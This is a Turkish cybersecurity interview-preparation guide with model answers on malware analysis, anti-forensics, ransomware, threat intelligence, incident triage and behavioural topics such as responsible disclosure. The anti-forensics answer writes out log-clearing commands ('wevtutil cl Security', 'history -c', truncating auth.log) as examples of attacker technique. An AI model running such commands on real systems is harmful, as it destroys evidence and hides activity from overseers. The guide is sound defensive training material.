Şüpheli dosyaları izole, kontrollü bir sanal ortamda çalıştırarak davranışlarını kaydeden sistemdir.

Kaydedilen aktiviteler: Süreç oluşturma, dosya değişiklikleri, registry yazma, ağ bağlantıları, API çağrıları

Online sandbox'lar:
  • Any.run — interaktif, gerçek zamanlı
  • VirusTotal (hybrid-analysis) — çoklu AV + sandbox
  • Joe Sandbox — detaylı enterprise rapor
  • Cuckoo — açık kaynak, kendi kurabileceğin
Anti-sandbox tespiti: Malware sanal makineyi algılayıp davranışını değiştirebilir (VM check: CPUID, registry key, timing).
Kontrollü ortamAny.runCuckooAPI monitorAnti-sandbox bypass

Anti-forensics teknikleri nelerdir?

Saldırganların dijital kanıtları silmek, gizlemek veya bozma girişimleri:

Log silme/manipülasyon:
  • Windows Event Log temizleme (wevtutil cl Security)
  • Linux: history -c, /var/log/auth.log truncate
Zaman damgası manipülasyonu (Timestomping): Dosyanın creation/modify zamanını değiştirmek ($STANDARD_INFORMATION vs $FILE_NAME farkı — birini değiştirmek diğerini etkilemez, böylece tespit edilir)

Veri imhası: Secure delete, disk wipe (Eraser, sdelete)

Şifreleme: Zararlı araçları şifreleyerek saklamak

Fileless teknikler: Diske yazmamak
Log temizlemeTimestompingSTANDARD_INFORMATIONsdeleteFileless

Rootkit nedir? Nasıl tespit edilir?

Sistemde varlığını ve diğer zararlı yazılımları gizlemek için tasarlanmış zararlı yazılım türüdür. Adını, root (sistem yöneticisi) erişimini gizlemekten alır.

Türleri:
  • Kernel mode rootkit: İşletim sistemi çekirdeğine entegre olur — en tehlikelisi, tespit edilmesi zor
  • User mode rootkit: Sistem API'lerini hooklayarak dosya/süreç listelerini manipüle eder
  • Bootkit: MBR/UEFI'yi enfekte eder, OS yüklemeden önce aktif olur
  • Hypervisor rootkit: Sistemi VM olarak çalıştırır, altında konumlanır
Tespit yöntemleri:
  • Güvenilir medyadan (LiveCD) boot edip dosya sistemi karşılaştır
  • Memory forensics (Volatility) ile kernel yapılarını analiz et
  • Integrity monitoring (Tripwire) ile dosya değişimlerini izle
Kernel modeMBR/UEFIVolatilityLiveCD analiziAPI hooking

Ransomware nasıl çalışır? Nasıl önlenir?

Kurbanın dosyalarını şifreleyerek şifre çözme anahtarı için fidye talep eden zararlı yazılımdır.

Tipik saldırı zinciri:
  1. Initial access (Phishing, RDP brute force, exploit)
  2. Privilege escalation
  3. Lateral movement — ağa yayılma
  4. Backup sistemlerini tespit ve silme/şifreleme
  5. Exfiltration (double extortion için)
  6. Şifreleme ve fidye notu bırakma
Şifreleme yöntemi: Dosyalar genelde AES ile şifrelenir, AES anahtarı saldırganın RSA public key'i ile şifrelenerek C2'ye gönderilir.

Önlemler:
  • 3-2-1 backup kuralı (3 kopya, 2 ortam, 1 off-site ve offline)
  • Network segmentation, EDR, email filtering
  • RDP expose etme, MFA
3-2-1 backupDouble extortionAES+RSA kombinasyonuLateral movementEDR

Statik ve dinamik malware analizi arasındaki fark nedir?

Statik Analiz: Zararlı yazılımı çalıştırmadan incelemektir.
  • File hash kontrolü (VT lookup)
  • String analizi (IP, URL, registry key, API çağrıları)
  • PE header analizi (importer, exporter, section özellikleri)
  • Disassembly / decompile (IDA Pro, Ghidra, Binary Ninja)
  • Paketlenmiş/obfuscate edilmiş kodu unpack etme
Dinamik Analiz: Zararlıyı kontrollü ortamda (sandbox) çalıştırarak davranışını gözlemlemektir.
  • Sistem çağrıları, registry, dosya, ağ aktivitesi izleme
  • Araçlar: Cuckoo Sandbox, ANY.RUN, Joe Sandbox
  • Process Monitor, Wireshark, API Monitor
İkisinin farkı: Statik → kod ne yapacak? Dinamik → gerçekte ne yapıyor?
IDA Pro/GhidraCuckoo SandboxPE headerString analiziANY.RUN

Fileless malware nedir? Neden tespit etmesi zordur?

Diske dosya yazmadan, sadece bellekte (in-memory) veya meşru sistem araçları üzerinde çalışan zararlı yazılım türüdür.

Teknikler:
  • PowerShell abuse: Encoded komutlarla bellekte zararlı kod çalıştırma
  • WMI persistence: Event subscription ile kalıcılık sağlama
  • Process injection: Meşru sürece (explorer.exe, svchost.exe) zararlı kod enjekte etme
  • Registry persistence: Payload'ı registry'de saklama
  • Living off the Land: certutil, mshta, regsvr32, wscript gibi Windows araçlarını kötüye kullanma
Neden zor tespit edilir: Disk üzerinde zararlı dosya yoktur. Geleneksel antivirüs dosya imzası arayamaz. EDR ve davranış analizi gerektirir.

Tespit: Memory forensics, PowerShell script block logging, AMSI.
In-memoryLotLPowerShell loggingProcess injectionAMSI

Threat intelligence nedir? IOC'lar nasıl kullanılır?

Threat Intelligence: Saldırganları, taktiklerini ve altyapılarını anlamak için toplanan, işlenen ve analiz edilen bilgidir.

Seviyeleri:
  • Strategic: Üst yönetim için — hangi gruplar ülkemizi hedef alıyor, trend nedir?
  • Operational: SOC yöneticisi için — aktif kampanyalar, saldırı vektörleri
  • Tactical: Analist için — TTPs (Taktik, Teknik, Prosedür)
  • Technical: Otomasyon için — IP, hash, domain, YARA kuralları
IOC Entegrasyonu: MISP, OpenCTI gibi platformlardan IOC alınır → SIEM/firewall/EDR'a beslenir → otomatik engelleme/alarm.

STIX/TAXII: Threat intelligence paylaşım standardı ve protokolü.
MISPSTIX/TAXIITTPsIOC beslemeStratejik/Taktik/Teknik

Packer nedir? Malware analizini neden zorlaştırır?

Packer, bir yürütülebilir dosyanın gerçek kodunu sıkıştıran, şifreleyen veya gizleyen katmandır. Zararlı yazılımlar bunu analizi ve imza tabanlı tespiti zorlaştırmak için sık kullanır.

Neden zorlaştırır:
  • String analizi anlamsızlaşır
  • Import table eksik veya yanıltıcı olabilir
  • Disassembly gürültülü hale gelir
  • AV/EDR statik imzaları atlatılabilir
Tespit ipuçları:
  • Anormal section entropy
  • Küçük import tablosu ama büyük davranış yüzeyi
  • UPX, Themida, VMProtect gibi bilinen packer izleri
  • Çalışınca bellekte yeni unpack edilmiş kod bölgeleri
Analist yaklaşımı: Önce packer var mı anlarsın, sonra kontrollü ortamda memory dump alıp gerçek payload’u çıkarırsın.
PackerEntropyUPX/ThemidaStatic analysis zorlaşmasıMemory dump

C2 beaconing trafiğini ağ tarafında nasıl ayırt edersin?

Beaconing, implant’ın C2 altyapısına düzenli aralıklarla "ben buradayım" diye check-in yapmasıdır. Normal web trafiğinden farklı olarak belirli bir ritim ve tekrar paterni gösterir.

Bakılacak işaretler:
  • Düzenli periyot: Her 30 sn / 60 sn / 5 dk benzer aralıklarla istek
  • Düşük hacim ama sürekli trafik: Az veri, çok tekrar
  • Benzer packet size: Her çağrıda benzer boyut
  • JA3/SNI anomali: TLS fingerprint veya hedef domain normal profile uymuyor
  • Jitter kullanımı: Tam sabit değil ama belirli band içinde tekrar ediyor
İyi cevapta NetFlow, proxy log, DNS log ve TLS metadata gibi verilerden korelasyon çıkarma yaklaşımı beklenir.
BeaconingJitterNetFlowJA3/SNIDüşük hacimli sürekli trafik

Bir endpoint’te malware şüphesi oluştuğunda ilk 15 dakikada hangi artefaktları toplarsın?

İlk hedef delili bozmadan hızlı triage yapmaktır.

Öncelikli artefaktlar:
  • Çalışan süreçler ve komut satırları
  • Ağ bağlantıları: aktif socket, hedef IP/domain, parent-child ilişki
  • Persistence noktaları: Run key, scheduled task, servis, startup klasörü
  • Son oluşturulan / değişen dosyalar
  • EDR timeline / alert chain
  • Memory capture mümkünse hemen
  • Kullanıcı bağlamı: Hangi kullanıcı oturum açmış, ayrıcalık seviyesi ne?
Önemli trade-off: Sistemi hemen kapatmak bazen volatile delili kaybettirir. Bu yüzden containment kararını delil ihtiyacı ve yayılma riskine göre verirsin.
TriagePersistence noktalarıMemory captureAğ bağlantılarıContainment trade-off

PE dosya yapısını bilmek malware analizinde neden önemlidir?

Windows çalıştırılabilir dosyalarının büyük bölümü PE (Portable Executable) formatındadır. Bu yapıyı bilmek, zararlının nasıl paketlendiğini, hangi API’leri kullanacağını ve anomali gösterip göstermediğini anlamayı kolaylaştırır.

Önemli bölümler:
  • DOS header ve PE signature
  • Section’lar: .text, .data, .rdata, .rsrc
  • Import table: hangi DLL ve fonksiyonlar kullanılacak?
  • Export table
  • Entry point
  • Resource section: ikon, config, embedded payload
Analist için değer: Şüpheli entry point, yüksek entropy, az import ama yoğun davranış beklentisi gibi işaretler sana packer, obfuscation veya özel loader kullanımı hakkında ipucu verir.
PE formatImport tableEntry pointSection entropyResource section

Malware anti-debugging ve anti-VM teknikleri neden kullanır?

Zararlı yazılımın amacı sadece çalışmak değil, analiz edilmeden çalışmaktır. Bu yüzden sandbox, debugger ve VM varlığını algılayıp davranışını değiştirebilir.

Yaygın teknikler:
  • Debugger kontrolü: IsDebuggerPresent, timing check, breakpoint fark etme
  • VM artefact kontrolü: registry key, process adı, MAC vendor, sürücü adı
  • Sleep veya uzun bekleme ile sandbox süresini aşma
  • Kullanıcı etkileşimi bekleme: mouse hareketi, tıklama
  • CPUID veya donanım davranışı ile sanallaştırma tespiti
Sonuç: Analist yanlışlıkla "zararlı bir şey yapmıyor" sanabilir. Bu yüzden anti-analysis farkındalığı, dinamik analiz sonuçlarını yorumlarken kritiktir.
Anti-debuggingAnti-VMSandbox evasionTiming checkIsDebuggerPresent

DLL sideloading nedir ve neden etkilidir?

Bir uygulamanın beklediği meşru DLL yerine saldırganın hazırladığı zararlı DLL’in yüklenmesini sağlamaktır. Meşru imzalı uygulama üzerinden çalıştığı için güvenilir görünür.

Nasıl olur: Uygulama belirli bir klasörden DLL arıyordur ve saldırgan aynı isimde zararlı DLL bırakır. Uygulama onu yükler, böylece zararlı kod meşru process içinde çalışır.

Neden etkili:
  • Parent process güvenilir görünür
  • Allow-list veya imza bazlı kontroller atlatılabilir
  • Kullanıcı tarafında normal uygulama açılmış gibi görünür
Tespit: Beklenmeyen DLL load path’leri, yeni dropped DLL, process + module analizi ve EDR telemetry üzerinden anlaşılabilir.
DLL sideloadingTrusted process abuseLoad pathEDR telemetryAllow-list bypass

İmzalı malware ne demektir? Kod imzası varsa neden yine de kötü olabilir?

Kod imzası, dosyanın belirli bir sertifika ile imzalandığını gösterir; dosyanın kötü niyetli olmadığını garanti etmez. Sertifika çalınmış, kötüye kullanılmış veya meşru bir vendor hesabı compromise olmuş olabilir.

Neden kritik:
  • Bazı savunma mekanizmaları imzalı dosyalara daha fazla güvenir
  • Kullanıcı tarafında "güvenilir yayıncı" algısı oluşur
  • Initial access ve persistence daha sessiz olabilir
Analist yaklaşımı: Sadece "signed/unsigned" bakılmaz. Sertifika zinciri, issuer, zaman damgası, reputation, önceki kampanyalar ve dosyanın gerçek davranışı birlikte değerlendirilir.
Code signingÇalınmış sertifikaTrusted publisher yanılgısıSertifika reputationDavranış analizi

Mutex ve named pipe artefaktları malware analizinde ne işe yarar?

Birçok zararlı yazılım aynı sistemde ikinci kez çalışmamak, process’ler arası iletişim kurmak veya belirli servis davranışını taklit etmek için mutex ve named pipe kullanır.

Neden önemli:
  • Kampanyaya özgü IOC olabilir
  • Aynı aileye ait örnekleri ilişkilendirmeyi kolaylaştırır
  • Sandbox ve memory dump içinde davranış izi bırakır
Örnek kullanım: Zararlı, başlarken belirli bir mutex oluşturur; varsa zaten aktif olduğunu anlar ve çalışmayı bırakır. Named pipe ise C2 modülü ile loader arasında iletişim için kullanılabilir.

Analist için değer: YARA kuralı, threat hunt veya memory forensics çıktısında güçlü ilişkilendirme verisi sağlar.
MutexNamed pipeIOC ilişkilendirmeAynı aile tespitiMemory artefaktı

Paketlenmiş bir malware örneğini açmaya (unpack) nasıl yaklaşırsın?

Unpacking kör bir şekilde tek araç çalıştırmak değildir; önce örneğin gerçekten paketli olup olmadığını anlamak gerekir.

Yaklaşım:
  1. Entropy, import table ve section yapısına bakarım
  2. Bilinen packer mı diye hızlı imza kontrolü yaparım
  3. Kontrollü ortamda örneği çalıştırıp OEP’ye (original entry point) yakın noktayı ararım
  4. Memory dump veya process dump alırım
  5. Dump edilen çıktıyı yeniden analiz eder, import repair gerekiyorsa düzeltirim
Önemli nokta: Her packer UPX gibi kolay açılmaz. Bazen tam unpack yerine davranış analiziyle ilerlemek daha verimli olabilir. Analist zamanını doğru yerde harcamalıdır.
UnpackingOEPMemory dumpImport repairEntropy analizi

Memory dump alırken neden dikkatli olmak gerekir?

Bellek görüntüsü, malware’in disk üzerinde bırakmadığı en kritik artefaktları içerebilir: inject edilmiş kod, çalışan config, şifre çözülmüş payload, ağ bağlantısı bağlamı gibi. Ama yanlış alım delili bozabilir veya sistemi etkileyebilir.

Dikkat edilmesi gerekenler:
  • Mümkün olduğunca güvenilir araç kullan
  • Canlı sistemde ek yük oluşturmanın riski değerlendirilir
  • Dump alma sırası containment planıyla uyumlu olmalı
  • Hash alınmalı ve chain of custody korunmalı
  • Disk alanı ve aktarım güvenliği planlanmalı
Mülakatta güçlü cevap memory dump’ın değerini, operasyonel riskini ve delil bütünlüğü tarafını birlikte ele alır.
Memory dumpDelil bütünlüğüInjected codeChain of custodyCanlı sistem riski

Malspam kaynaklı bir malware vakasında hangi artefakt zincirini takip edersin?

Malspam vakasında amaç sadece eki bulmak değil, e-postadan payload’a kadar zinciri çıkarmaktır.

Takip edilecek artefaktlar:
  • E-posta header ve gönderici altyapısı
  • Ek dosya hash’i, macro, embedded URL veya archive içeriği
  • Kullanıcının açtığı zaman çizgisi
  • Child process zinciri: Outlook/Word → PowerShell → cmd → payload gibi
  • İndirilen dosya yolu, temp klasörleri, script logları
  • C2 iletişimi ve sonraki persistence davranışı
İyi cevapta hem e-posta telemetrisi hem endpoint telemetry hem de network log’un birlikte korele edilmesi beklenir. Çünkü ilk dosya silinmiş olsa bile süreç zinciri ve ağ izi kalabilir.
MalspamEmail headerProcess chainMacro/URLEndpoint + network korelasyonu

Davranis

Siber güvenliğe nasıl ilgi duydunuz? Bu alana nasıl girdiniz?

İyi cevap unsurları:
  • Somut bir dönüm noktası veya ilk deneyim (CTF, bir kitap, bir olay)
  • Kendi kendine öğrenme süreci (TryHackMe, HackTheBox)
  • Akademik veya profesyonel bağlantı
  • Spesifik bir alan ilgisi (red/blue/appsec/cloud)
Örnek çerçeve: "[Olay/deneyim] ile başladım → [platform/sertifika/CTF] ile pratik yaptım → [spesifik alan] üzerine yoğunlaşmaya karar verdim çünkü [neden]"

Kaçın: Çok genel cevaplar ("hep teknoloji sevdim"), "iyi para var" vb.
Dönüm noktasıCTFTryHackMeHackTheBoxÖzgüllük önemli

Sürekli değişen tehdit ortamında kendinizi nasıl güncel tutuyorsunuz?

Kaynaklar:
  • Krebs on Security, Schneier on Security
  • SANS Internet Stormcast (günlük podcast)
  • Vendor raporları: Mandiant M-Trends, CrowdStrike GTR
  • CVE/NVD takibi
Pratik:
  • HackTheBox / TryHackMe
  • CTF katılımı
  • Home lab
Topluluk: BSides, DEF CON, Black Hat konuşmaları
SANSKrebsCTFHome labVendor raporu

Bir güvenlik açığı buldunuzda nasıl hareket edersiniz?

Kapsam içindeyse: Kanıtla → Raporla (etki, yeniden üretim, CVSS) → Sistemden çık

Kapsam dışındaysa: Üst yönetime bildir, kendi başına geniş test yapma

Responsible disclosure: Kuruluşa gizlice bildir, düzeltme için süre ver (90 gün), yama sonrası kamuoyunu bilgilendir

Kesinlikle: Exploit etme, veri alma, kendi başına yayımlama.
Responsible disclosureRaporlamaKapsam farkıCVSSv3

Görev tanımınız dışına çıkarak bir sistemi hackleseydiniz ne yapardınız?

Bu soru etik ve hukuki farkındalığınızı ölçer.

Doğru yaklaşım:
  1. Hemen durdur. Daha ileri gitme.
  2. Yöneticinizi veya hukuki/güvenlik ekibini bildir.
  3. Bulguları belgele: nasıl buldun, ne gördün, ne yaptın.
  4. Etkilenen ekipleri bilgilendir.
Neden önemli: Kapsam dışı test, iyi niyetle yapılmış olsa bile TCK 243 (bilişim sistemine girme) kapsamında suç oluşturabilir.

Yanlış cevap: "Devam ederdim çünkü iyi niyet var" veya "kimseye söylemezdim".
Hemen durdurmakBildirme zorunluluğuTCK 243İyi niyet yeterli değilBelgeleme

Güvenlik ile kullanılabilirlik (usability) çatıştığında nasıl karar verirsiniz?

Bu klasik bir denge sorusudur. "Her zaman güvenlik" veya "her zaman kullanılabilirlik" yanlış.

Doğru yaklaşım — risk bazlı karar:
  • Hangi varlığı koruyoruz? Risk değeri ne kadar yüksek?
  • Güvenlik önleminin maliyeti (UX sürtünmesi) nedir?
  • Kullanıcının toleransı ne kadar?
Örnek: Kritik finansal işlemde MFA gerekli (yüksek risk). Ama sosyal medya like butonunda MFA saçma (düşük risk, çok sürtünme).

İyi cevap: Riski ölçtükten sonra dengeleme; paydaşlarla birlikte karar; güvenli ama kullanılabilir tasarım aramak.
Risk bazlı kararUX sürtünmesiPaydaş katılımıBağlam önemli

Takımınızda bir ihlal yaşandığında nasıl iletişim kurarsınız?

Katmanlar:
  • Teknik ekip: Hızlı, gerçek zamanlı, teknik detaylar
  • Yönetim: Özlü — "X etkilendi, containment yapıldı, Y güne çözüm"
  • C-Suite/Hukuk: GDPR 72 saat bildirimi, müşteri bildirim gerekiyor mu?
Prensipler: Paniklememe, doğrulanmamış bilgi paylaşmama, lesson learned dokümante etme.
Stakeholder katmanları72 saat GDPRİletişim planıŞeffaflık

Bir üst yönetici yanlış bir güvenlik kararı almak istese ne yaparsınız?

  1. Endişeni kanıta dayalı, iş etkisi diliyle açıkla
  2. Alternatif öner
  3. Yazılı belgele
  4. Gerekirse eskalat (CISO, Hukuk, Risk Komitesi)
  5. Karar alındıktan sonra izlemeye devam et
Kaçın: "Peki" deyip susmak; tam aksi tavır alarak ilişkiyi bozmak.
İş etkisi diliYazılı belgeleAlternatif sunEscalation

Takımınızla anlaşmazlık yaşadığınız bir teknik karar örneği verin.

STAR formatıyla cevapla:
  • S (Situation): Anlaşmazlığın bağlamı neydi?
  • T (Task): Senin rolün ve görüşün neydi?
  • A (Action): Nasıl yaklaştın? Kanıta dayalı argüman mı, proof of concept mi, eskalasyon mu?
  • R (Result): Nasıl sonuçlandı? (Kazanmak veya ikna olmak ikisi de kabul edilebilir)
İyi cevap unsurları:
  • Somut teknik anlaşmazlık (misal: WAF bypass riski, patch önceliği)
  • Dinleme, karşı tarafı anlama
  • Veriyle konuşma
  • Ego'yu bir kenara bırakma
STAR formatKanıta dayalıEgo bir kenaraDinlemeSonuç paylaşımı

Siber güvenlikte kendinizi nasıl güncel tutuyorsunuz?

İyi cevap unsurları (somut kaynaklar vermek önemli):
  • Haber & Blog: Krebs on Security, Schneier on Security, The Hacker News, Dark Reading
  • Teknik yayın: CVE listesi, NVD, vendor advisory'leri (Microsoft Patch Tuesday)
  • Pratik: CTF (Hack The Box, TryHackMe, PicoCTF), home lab kurulumu
  • Topluluk: DEF CON / Black Hat konuşmaları (YouTube'da ücretsiz), yerel BSides etkinlikleri
  • Sertifikasyon: OSCP, CEH, CompTIA, CISSP gibi öğrenme yolları
  • Threat intel: MITRE ATT&CK güncellemeleri, vendor raporları (Mandiant, CrowdStrike)
Önemli: Spesifik örnekler ver. "İnternetten takip ediyorum" demek yetmez.
Krebs on SecurityHack The BoxCTFPatch TuesdayDEF CON

Karmaşık bir güvenlik açığını teknik olmayan bir üst yöneticiye nasıl anlatırsınız?

Temel kural: Teknik jargondan kaçın, iş etkisi ve risk diliyle konuş.

Yapı:
  1. Ne oldu (basit): "Sistemimizde bir güvenlik açığı var"
  2. Risk ne: "Bir saldırgan bunu kullanırsa müşteri verilerimize erişebilir"
  3. Olasılık & etki: "Bu yüksek olasılıklı ve yasal yaptırımlara yol açar (GDPR)"
  4. Çözüm & maliyet: "Düzeltmek için 3 gün ve 1 geliştirici gerekiyor"
  5. Hareketsizlik maliyeti: "Düzeltmezsek ihlal durumunda ceza X TL olabilir"
Araçlar: Risk matrisler, basit diyagramlar, analoji kullanımı
Kaçın: Teknik detay bombardımanı, panik yaratma, çözümsüz problem sunma.
İş etkisi diliRisk matrisiJargonsuzMaliyet analiziÇözüm öner

"En büyük güçlü ve zayıf yönün nedir?" sorusunu güvenlik bağlamında nasıl cevaplamalısın?

Güçlü yön için: Siber güvenliğe özgü, somut ve kanıtlanmış bir güç seç.
Örnek: "Sistem güvenlik açıklarını hızla tespit etme yeteneğim — THM'de 50+ oda tamamladım, CVE raporuyla desteklenmiş pentest projem var"

Zayıf yön için: Gerçek bir zayıflık söyle ama nasıl üstünde çalıştığını ekle. Sahte zayıflıklar ("mükemmeliyetçiyim") mülakatta kötü izlenim bırakır.
Örnek: "Cloud güvenliği konusunda geliştirmem gerekiyor. Bu yüzden AWS Security Specialty için çalışıyorum ve cloud lab kurdum"

Kaçınılması gerekenler:
  • İşe doğrudan etki eden kritik zayıflık söylemek
  • Sahte zayıflıklar
  • Zayıflık üzerine çalışmadığını göstermek
Somut kanıtGelişim odaklıSTAR formatıGerçek zayıflıkSüregelen gelişim

Daha önce hiç görmediğin bir sistem veya teknolojiyle çalışmak zorunda kalsaydın nasıl yaklaşırdın?

Bu soru öğrenme yetkinliğini ve metodolojini ölçer. İyi cevap sistematik bir yaklaşım gösterir:

  1. Resmi dokümantasyonla başla: Vendor dokümantasyonu, RFC, resmi güvenlik rehberleri
  2. Güvenlik odaklı araştır: CVE veritabanı, güvenlik bulguları, bilinen saldırı vektörleri
  3. Lab ortamı kur: Üretim sistemine dokunmadan test et
  4. Topluluktan öğren: GitHub issues, Stack Overflow, ilgili Slack/Discord toplulukları
  5. Uzman bul: İç ekipte bilen var mı? Danışmanlık alınabilir mi?
Somut örnek: "Kubernetes ile hiç çalışmamıştım. Önce K8s Security Whitepaper'ı okudum, sonra Minikube ile lokal lab kurdum, ardından CIS Benchmark'i inceledim"
DokümantasyonLab ortamıCVE araştırmasıToplulukYapılandırılmış öğrenme

5 yıl içinde kariyer hedefin nedir?

Mülakatçı bu soruyla şunları ölçer: Gerçekçi misin? Şirket hedefleriyle örtüşüyor mu? Öğrenme motivasyonun var mı?

İyi cevap yapısı:
  • Kısa vadeli (1-2 yıl): Mevcut pozisyonda derinleşme, somut sertifikasyon hedefi
  • Orta vadeli (3-5 yıl): Uzmanlık alanı geliştirme veya teknik liderlik
  • Şirkete bağlantı: "Bu şirketteki X projesi bu hedefe ulaşmamı destekler"
Uzmanlık alanı örnekleri: Red team operasyonları, cloud security architecture, malware analizi, AppSec mühendisliği, CISO yolu

Kaçın: "Bilmiyorum", tamamen farklı bir alan (örn. "aslında yazılım geliştirici olmak istiyorum"), aşırı iddialı hedefler ("5 yılda CISO olacağım")
Kısa/orta vadeli hedefŞirkete uyumUzmanlık alanıGerçekçilikÖğrenme motivasyonu

Mülakatta cevabını tam bilmediğin bir soruya nasıl yaklaşmalısın?

Burada amaç blöf değil, düşünme biçimini göstermek. Güçlü bir aday "bilmiyorum" ile "yine de sistematik düşünebilirim" arasındaki dengeyi kurar.

İyi yaklaşım:
  1. Dürüstçe sınırı koy: "Bu konuda tam emin değilim ama şöyle yaklaşırım"
  2. Bildiklerinden başla: temel prensip, benzer teknoloji, risk modeli
  3. Varsayımını açık söyle
  4. Yanlış olabilecek kısmı ayır
  5. Doğrulama adımını ekle: log, dokümantasyon, RFC, vendor docs
Kaçın: Uydurmak, aşırı özgüvenli ama hatalı cevap vermek veya tamamen susmak. Mülakatçı çoğu zaman sonuca değil, düşünme yapına bakar.
Dürüst sınır koymakVarsayım belirtmekDüşünme biçimiDoğrulama adımıBlöf yapmamak

Canlı ortamda kritik bir açık buldun ama ekip hemen kesinti istemiyor. Nasıl ilerlersin?

Bu soru teknik doğruluk kadar risk iletişimini ölçer. Doğru cevap "hemen kapatırım" ya da "beklerim" gibi tek boyutlu olmamalı.

Güçlü cevap akışı:
  1. Açığın gerçek etkisini ve exploitability düzeyini doğrularım
  2. İş etkisini anlamak için ilgili ekiplerle kısa war-room açarım
  3. Kalıcı yama gelene kadar telafi kontrolleri öneririm: WAF kuralı, erişim daraltma, feature kapatma, ACL, rate limit
  4. Risk kabulü gerekiyorsa bunu yazılı ve yönetilebilir hale getiririm
  5. İzleme ve rollback planı olmadan değişiklik yapmam
Mülakatta beklenen nokta: Güvenlik, operasyon ve iş sürekliliğini birlikte düşünmek.
Risk iletişimiTelafi kontrolüWar-roomYazılı risk kabulüİş sürekliliği

Aynı anda birden fazla güvenlik işi geldiğinde nasıl önceliklendirirsin?

Burada mülakatçı baskı altında nasıl karar verdiğini görmek ister. İyi cevap, sadece "önemli olana bakarım" demekten daha sistematik olmalı.

Pratik çerçeve:
  • Etki: Veri kaybı, müşteri etkisi, üretim riski var mı?
  • Olasılık / aktif sömürü: İnternete açık mı, exploit var mı, aktif alarm var mı?
  • Zaman hassasiyeti: SLA, regülasyon, müşteri taahhüdü
  • Bağımlılık: Önce çözülmesi gereken blocker var mı?
  • Delegasyon: Paralel gidebilecek işleri uygun kişilere bölerim
İyi cevapta kısa bir örnek çok güçlendirir: "Aktif incident varsa önce containment, sonra yüksek riskli açık, sonra uzun vadeli hardening".
Etki ve olasılıkAktif exploitSLADelegasyonContainment önce

Bir güvenlik işinde hata yaptığın bir örneği nasıl anlatırsın?

Mülakatçı burada kusursuzluk değil, sahiplenme ve öğrenme becerisi arar. En güçlü cevap savunmaya geçmeden sorumluluğu alan cevaptır.

Güçlü çerçeve:
  1. Kısa ve somut şekilde ne olduğunu anlat
  2. Hatanın etkisini saklama ama dramatize de etme
  3. Hemen ne yaptığını söyle: rollback, bildirim, telafi adımı
  4. Kök neden neydi?
  5. Tekrar etmemesi için hangi süreç/kontrolü ekledin?
Kaçın: Suçu tamamen başkasına atmak, belirsiz konuşmak veya "aslında hata değildi" gibi savunmacı tona kaçmak.
SahiplenmeKök nedenTelafi adımıÖğrenmeSavunmacı olmamak

Geliştirici ekip güvenliği “yavaşlatan ekip” gibi görüyorsa nasıl yaklaşırdın?

Burada ilişki yönetimi ve güvenlik etkisini aynı anda korumak gerekir. Sert ama işbirliksiz bir tavır çoğu zaman daha fazla direnç üretir.

İyi yaklaşım:
  • Önce neden direnç olduğunu anlamaya çalışırım: deadline baskısı mı, gürültülü bulgu mu, tekrar eden manuel iş mi?
  • Bulgu dilini iş ve exploit etkisi üzerinden netleştiririm
  • Mümkünse geliştirici akışına entegre çözüm sunarım: CI tarama, reusable fix pattern, secure default
  • Hızlı kazanım sağlayan birkaç örnekle güven inşa ederim
  • “Hayır” diyen ekip değil, çözüm üreten partner olmaya çalışırım
Mülakatta beklenen nokta: Güvenlik hedefini korurken karşı tarafı düşmanlaştırmamak.
İlişki yönetimiCI entegrasyonuSecure defaultDirenci anlamaPartner yaklaşımı

Yeterli veri olmadan incident kararı vermen gereken anlarda nasıl hareket edersin?

Gerçek olaylarda her bilgi tam gelmez. İyi cevap, belirsizlik altında kontrollü karar verebildiğini göstermelidir.

Yaklaşım:
  1. Hangi kararın geri döndürmesi daha pahalı onu belirlerim
  2. Bilgiyi “kesin”, “olasılıklı”, “bilinmiyor” diye ayırırım
  3. En düşük pişmanlık yaratan containment adımını seçerim
  4. Zaman kutulu yeniden değerlendirme noktası koyarım
  5. Varsayımlarımı ve riskleri açıkça yazarım
İyi cevapta hem hız hem de kayıt/disiplin vardır. “Tüm veri gelene kadar beklerim” çoğu zaman zayıf yanıttır.
Belirsizlik yönetimiContainment kararıVarsayım yazmakZaman kutusuEn düşük pişmanlık

Aldığın sert bir geri bildirimi nasıl yönettin?

Bu soru savunmaya geçip geçmediğini ve gelişime açıklığını ölçer. İyi cevapta hem duygusal olgunluk hem de aksiyon görünmelidir.

Güçlü cevap yapısı:
  • Geri bildirimin zorlayıcı kısmını dürüstçe söyle
  • İlk refleksin yerine ne yaptığını anlat: dinledim, not aldım, örnek istedim
  • Katıldığın ve katılmadığın kısmı profesyonelce ayır
  • Somut geliştirme adımını ve sonucun ne olduğunu ekle
Önemli: Mülakatçı "eleştiriyi seviyorum" klişesinden çok, davranış değişikliği olup olmadığına bakar.
Savunmaya geçmemekÖrnek istemekDavranış değişikliğiProfesyonellikÖz farkındalık

Neden bu rol ve neden bu ekip?

Bu soru motivasyonun gerçek mi, yoksa rastgele başvuru mu onu ölçer. Güçlü cevap hem seni hem şirketi tanıdığını göstermelidir.

İyi cevap unsurları:
  • Rolün teknik içeriğine spesifik bağ kur
  • Şirketin ürünü, ölçeği veya güvenlik olgunluğu ile neden ilgilendiğini söyle
  • Kendi geçmişinle rolün kesişimini net kur
  • Sadece “öğrenmek istiyorum” değil, ne katkı vereceğini de ekle
Kaçın: Çok genel cevaplar, sadece maaş/marka vurgusu veya şirketi hiç araştırmadığını belli eden ifadeler.
Rol uyumuŞirket araştırmasıKatkı sunmakTeknik bağGenel konuşmamak

İlk 90 günde bu rolde nasıl bir öğrenme ve katkı planı kurardın?

Mülakatçı burada gerçekçi onboarding yaklaşımı görmek ister. Güçlü aday ilk günden devrim vaat etmez; önce anlamayı, sonra küçük ama net katkı üretmeyi planlar.

Örnek yapı:
  • İlk 30 gün: Sistemleri, ekip akışını, kritik varlıkları ve mevcut riskleri anlamak
  • 30-60 gün: Küçük ama görünür iyileştirmeler yapmak; örneğin bir detection use-case, bir hardening checklist, bir triage runbook
  • 60-90 gün: Tekrarlanabilir katkı alanı oluşturmak; otomasyon, dokümantasyon, süreç iyileştirmesi
İyi cevap öğrenme isteğini gösterirken ölçülebilir katkı da vaat eder.
İlk 30/60/90 günOnboardingKüçük görünür katkıRunbookGerçekçi plan

Yoğun incident veya on-call dönemlerinde nasıl dengede kalırsın?

Bu soru sadece kişisel iyi oluşu değil, sürdürülebilir çalışma biçimini de ölçer. Güçlü cevap kahramanlık değil, disiplin gösterir.

İyi yaklaşım:
  • Yoğunlukta önce net öncelik listesi çıkarırım
  • Uzayan olaylarda devir planı ve not bırakma disiplinine dikkat ederim
  • Kritik kararları yalnız almam, kısa sync noktaları oluştururum
  • Olay sonrası toparlanma ve lesson learned için zaman ayırırım
